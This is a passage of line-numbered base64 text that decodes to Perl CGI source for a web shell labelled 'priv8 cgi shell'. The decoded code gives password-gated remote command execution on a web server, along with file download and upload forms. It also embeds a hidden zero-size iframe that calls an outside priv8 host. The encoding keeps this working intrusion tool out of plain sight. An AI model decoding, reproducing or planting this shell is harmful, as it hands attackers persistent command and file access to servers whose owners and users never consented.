1665. ZGVyPSIwIiBzcmM9Imh0dHA6Ly93d3cucHJpdjguaWJsb2dnZXIub3JnL3MucGhwPytjZ2l0ZWxu
1666. ZXQgc2hlbGwiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjwvcHJlPg0KJDsNCiMnDQoJcHJpbnQgPDxF
1667. TkQ7DQo8Y29kZT4NCg0KVHJ5aW5nICRTZXJ2ZXJOYW1lLi4uPGJyPg0KQ29ubmVjdGVkIHRvICRT
1668. ZXJ2ZXJOYW1lPGJyPg0KRXNjYXBlIGNoYXJhY3RlciBpcyBeXQ0KPGNvZGU+JE1lc3NhZ2UNCkVO
1669. RA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1670. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgbWVzc2FnZSB0aGF0
1671. IGluZm9ybXMgdGhlIHVzZXIgb2YgYSBmYWlsZWQgbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0t
1672. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1673. LS0NCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQ0Kew0KCXByaW50IDw8RU5EOw0KPGNvZGU+
1674. DQo8YnI+bG9naW46IGFkbWluPGJyPg0KcGFzc3dvcmQ6PGJyPg0KTG9naW4gaW5jb3JyZWN0PGJy
1675. Pjxicj4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1676. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50
1677. cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1678. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
1679. dWIgUHJpbnRMb2dpbkZvcm0NCnsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQo8Zm9ybSBuYW1l
1680. PSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCjxpbnB1dCB0eXBl
1681. PSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+DQo8L2ZvbnQ+DQo8Zm9udCBzaXplPSIz
1682. Ij4NCmxvZ2luOiA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2
1683. Ij5wcml2OCBjZ2kgc2hlbGw8L2I+PGJyPg0KcGFzc3dvcmQ6PC9mb250Pjxmb250IGNvbG9yPSIj
1684. MDA5OTAwIiBzaXplPSIzIj48aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InAiPg0KPGlucHV0
1685. IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0K
1686. DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1687. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRN
1688. TCBQYWdlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1689. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlRm9vdGVyDQp7DQoJ
1690. cHJpbnQgIjwvZm9udD48L2JvZHk+PC9odG1sPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
1691. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1692. LS0NCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNh
1693. biBiZSBhY2Nlc3NlcyB1c2luZyB0aGUNCiMgdmFyaWFibGUgJENvb2tpZXN7Jyd9DQojLS0tLS0t
1694. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1695. LS0tLS0tLS0tLS0tLS0tDQpzdWIgR2V0Q29va2llcw0Kew0KCUBodHRwY29va2llcyA9IHNwbGl0
1696. KC87IC8sJEVOVnsnSFRUUF9DT09LSUUnfSk7DQoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2ll
1697. cykNCgl7DQoJCSgkaWQsICR2YWwpID0gc3BsaXQoLz0vLCAkY29va2llKTsNCgkJJENvb2tpZXN7
1698. JGlkfSA9ICR2YWw7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1699. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0
1700. aGUgc2NyZWVuIHdoZW4gdGhlIHVzZXIgbG9ncyBvdXQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1701. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
1702. CnN1YiBQcmludExvZ291dFNjcmVlbg0Kew0KCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3Nl
1703. ZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0t
1704. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1705. LS0tLS0tLQ0KIyBMb2dzIG91dCB0aGUgdXNlciBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGxvZ2lu
1706. IGFnYWluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1707. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ291dA0Kew0KCXBy
1708. aW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUN
1709. CgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJJlByaW50TG9nb3V0U2NyZWVuOw0KDQoJJlByaW50
1710. TG9naW5TY3JlZW47DQoJJlByaW50TG9naW5Gb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoN
1711. CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1712. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9n
1713. aW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdA0KIyBkaXNwbGF5cyBhIHBh
1714. Z2UgdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gcnVuIGNvbW1hbmRzLiBJZiB0aGUgcGFzc3dvcmQg
1715. ZG9lbnMndA0KIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5
1716. cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gbG9naW4NCiMtLS0tLS0tLS0tLS0t
1717. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1718. LS0tLS0tLS0NCnN1YiBQZXJmb3JtTG9naW4gDQp7DQoJaWYoJExvZ2luUGFzc3dvcmQgZXEgJFBh
1719. c3N3b3JkKSAjIHBhc3N3b3JkIG1hdGNoZWQNCgl7DQoJCXByaW50ICJTZXQtQ29va2llOiBTQVZF
1720. RFBXRD0kTG9naW5QYXNzd29yZDtcbiI7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJJlBy
1721. aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KCWVsc2Ug
1722. IyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoInAiKTsNCgkJ
1723. JlByaW50TG9naW5TY3JlZW47DQoJCWlmKCRMb2dpblBhc3N3b3JkIG5lICIiKSAjIHNvbWUgcGFz
1724. c3dvcmQgd2FzIGVudGVyZWQNCgkJew0KCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOw0KDQoJ
1725. CX0NCgkJJlByaW50TG9naW5Gb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KIy0t
1726. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1727. LS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0
1728. aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1729. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBy
1730. aW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
1731. RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8
1732. PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3Jp
1733. cHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFu
1734. ZCI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
1735. JFByb21wdA0KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPg0KPGlucHV0IHR5cGU9InN1Ym1p
1736. dCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCg0KRU5EDQp9DQoNCiMtLS0tLS0t
1737. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1738. LS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVz
1739. ZXIgdG8gZG93bmxvYWQgZmlsZXMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1740. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludEZp
1741. bGVEb3dubG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDog
1742. IlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxj
1743. b2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlv
1744. biI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
1745. PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImRvd25sb2FkIj4NCiRQcm9tcHQg
1746. ZG93bmxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBz
1747. aXplPSIzNSI+PGJyPjxicj4NCkRvd25sb2FkOiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0i
1748. QmVnaW4iPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
1749. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1750. LS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2Fk
1751. IGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1752. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlVXBsb2FkRm9ybQ0K
1753. ew0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVy
1754. TmFtZSAkQ3VycmVudERpcl1cJCAiOw0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNCjxmb3JtIG5h
1755. bWU9ImYiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCIgYWN0aW9u
1756. PSIkU2NyaXB0TG9jYXRpb24iPg0KJFByb21wdCB1cGxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxp
1757. bnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCk9wdGlvbnM6ICZu
1758. YnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgdmFsdWU9Im92ZXJ3cml0ZSI+DQpP
1759. dmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4NClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8
1760. aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIg
1761. bmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9
1762. ImEiIHZhbHVlPSJ1cGxvYWQiPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0t
1763. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1764. LS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91
1765. dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8NCiMgdGVybWluYXRlIHRoZSBzY3Jp
1766. cHQgaW1tZWRpYXRlbHkuIFRoaXMgZnVuY3Rpb24gaXMgdmFsaWQgb25seSBvbiBVbml4LiBJdCBp
1767. cw0KIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuDQojLS0t
1768. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1769. LS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQ29tbWFuZFRpbWVvdXQNCnsNCglpZighJFdpbk5UKQ0K
1770. CXsNCgkJYWxhcm0oMCk7DQoJCXByaW50IDw8RU5EOw0KPC94bXA+DQoNCjxjb2RlPg0KQ29tbWFu
1771. ZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25k
1772. KHMpLg0KPGJyPktpbGxlZCBpdCENCkVORA0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsN
1773. CgkJJlByaW50UGFnZUZvb3RlcjsNCgkJZXhpdDsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0t
1774. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1775. LS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQg
1776. ZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUNCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2Vy
1777. IHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkNCiMgY29tbWFu
1778. ZCBpcyBoYW5kbGVkIGRpZmZlcmVudGx5LiBJbiB0aGlzIGNhc2UsIHRoZSBuZXcgZGlyZWN0b3J5
1779. IGlzIHN0b3JlZCBpbg0KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRp
1780. bWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlDQojIG91dHB1dCBvZiB0aGUgY2hh
1781. bmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzDQojIHRo
1782. ZXJlZm9yZSBlcnJvciBtZXNzYWdlcyBjYW5ub3QgYmUgZGlzcGxheWVkLg0KIy0tLS0tLS0tLS0t
1783. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1784. LS0tLS0tLS0tLQ0Kc3ViIEV4ZWN1dGVDb21tYW5kDQp7DQoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9e
1785. XHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZA0KCXsNCgkJIyB3ZSBj
1786. aGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQ0KCQkjIGNv
1787. bW1hbmQgaXMgbm90IGRpc3BsYXllZC4NCgkJDQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsNCgkJ
1788. JENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4k
1789. Q21kUHdkOw0KCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7DQoJCSZQcmludFBhZ2VI
1790. ZWFkZXIoImMiKTsNCgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxA
1791. JFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOw0KCQlwcmludCAiJFByb21wdCAkUnVuQ29tbWFuZCI7
1792. DQoJfQ0KCWVsc2UgIyBzb21lIG90aGVyIGNvbW1hbmQsIGRpc3BsYXkgdGhlIG91dHB1dA0KCXsN
1793. CgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
1794. RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCgkJcHJpbnQg
1795. IiRQcm9tcHQgJFJ1bkNvbW1hbmQ8eG1wPiI7DQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnRE
1796. aXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsNCgkJaWYoISRXaW5OVCkNCgkJ
1797. ew0KCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsNCgkJCWFsYXJtKCRDb21tYW5k
1798. VGltZW91dER1cmF0aW9uKTsNCgkJfQ0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBv
1799. dXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkDQoJCXsNCgkJCSR8PTE7DQoJCQkkQ29tbWFuZCAuPSAi
1800. IHwiOw0KCQkJb3BlbihDb21tYW5kT3V0cHV0LCAkQ29tbWFuZCk7DQoJCQl3aGlsZSg8Q29tbWFu
1801. ZE91dHB1dD4pDQoJCQl7DQoJCQkJJF8gPX4gcy8oXG58XHJcbikkLy87DQoJCQkJcHJpbnQgIiRf
1802. XG4iOw0KCQkJfQ0KCQkJJHw9MDsNCgkJfQ0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29t
1803. bWFuZCBjb21wbGV0ZXMNCgkJew0KCQkJcHJpbnQgYCRDb21tYW5kYDsNCgkJfQ0KCQlpZighJFdp
1804. bk5UKQ0KCQl7DQoJCQlhbGFybSgwKTsNCgkJfQ0KCQlwcmludCAiPC94bXA+IjsNCgl9DQoJJlBy
1805. aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0t
1806. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1807. LS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQg
1808. Y29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcg0KIyB0byBkb3dubG9hZCB0aGUg
1809. c3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gNCiMg
1810. ZmVhdHVyZSB0aGF0IHN0YXJ0cyB0aGUgZG93bmxvYWQgYXV0b21hdGljYWxseS4NCiMgQXJndW1l
1811. bnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2Fk
1812. ZWQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1813. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludERvd25sb2FkTGlua1BhZ2UNCnsN
1814. Cglsb2NhbCgkRmlsZVVybCkgPSBAXzsNCglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBl
1815. eGlzdHMNCgl7DQoJCSMgZW5jb2RlIHRoZSBmaWxlIGxpbmsgc28gd2UgY2FuIHNlbmQgaXQgdG8g
1816. dGhlIGJyb3dzZXINCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJI
1817. KiIsJDEpL2VnOw0KCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2Fk
1818. JmY9JEZpbGVVcmwmbz1nbyI7DQoJCSRIdG1sTWV0YUhlYWRlciA9ICI8bWV0YSBIVFRQLUVRVUlW
1819. PVwiUmVmcmVzaFwiIENPTlRFTlQ9XCIxOyBVUkw9JERvd25sb2FkTGlua1wiPiI7DQoJCSZQcmlu
1820. dFBhZ2VIZWFkZXIoImMiKTsNCgkJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCg0KU2VuZGluZyBGaWxl
1821. ICRUcmFuc2ZlckZpbGUuLi48YnI+DQpJZiB0aGUgZG93bmxvYWQgZG9lcyBub3Qgc3RhcnQgYXV0
1822. b21hdGljYWxseSwNCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lg0KRU5E
1823. DQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0N
1824. CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0DQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7
1825. DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhIjsNCgkJJlByaW50Rmls
1826. ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCiMtLS0tLS0tLS0t
1827. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1828. LS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJv
1829. bSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlDQojIGJyb3dzZXIsIHNvIHRoYXQgaXQgY2Fu
1830. IGJlIGRvd25sb2FkZWQgYnkgdGhlIHVzZXIuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmll
1831. ZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBzZW50Lg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0t
1832. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1833. LQ0Kc3ViIFNlbmRGaWxlVG9Ccm93c2VyDQp7DQoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOw0KCWlm
1834. KG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcNCgl7
1835. DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJYmlubW9kZShTRU5ERklMRSk7DQoJCQliaW5tb2RlKFNU
1836. RE9VVCk7DQoJCX0NCgkJJEZpbGVTaXplID0gKHN0YXQoJFNlbmRGaWxlKSlbN107DQoJCSgkRmls
1837. ZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsNCgkJcHJpbnQgIkNvbnRlbnQt
1838. VHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOw0KCQlwcmludCAiQ29udGVudC1MZW5ndGg6
1839. ICRGaWxlU2l6ZVxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7
1840. IGZpbGVuYW1lPSQxXG5cbiI7DQoJCXByaW50IHdoaWxlKDxTRU5ERklMRT4pOw0KCQljbG9zZShT
1841. RU5ERklMRSk7DQoJfQ0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlDQoJew0KCQkmUHJpbnRQ
1842. YWdlSGVhZGVyKCJmIik7DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAk
1843. ISI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9
1844. DQp9DQoNCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1845. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxl
1846. ZCB3aGVuIHRoZSB1c2VyIGRvd25sb2FkcyBhIGZpbGUuIEl0IGRpc3BsYXlzIGEgbWVzc2FnZQ0K
1847. IyB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rIHRocm91Z2ggd2hpY2ggdGhlIGZpbGUg
1848. Y2FuIGJlIGRvd25sb2FkZWQuDQojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0
1849. aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsDQojIHRoZSBmaWxlIGlz
1850. IHJlYWQgYW5kIHNlbnQgdG8gdGhlIGJyb3dzZXIuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1851. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
1852. dWIgQmVnaW5Eb3dubG9hZA0Kew0KCSMgZ2V0IGZ1bGx5IHF1YWxpZmllZCBwYXRoIG9mIHRoZSBm
1853. aWxlIHRvIGJlIGRvd25sb2FkZWQNCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9e
1854. XFx8Xi46LykpIHwNCgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBw
1855. YXRoIGlzIGFic29sdXRlDQoJew0KCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7DQoJfQ0K
1856. CWVsc2UgIyBwYXRoIGlzIHJlbGF0aXZlDQoJew0KCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFy
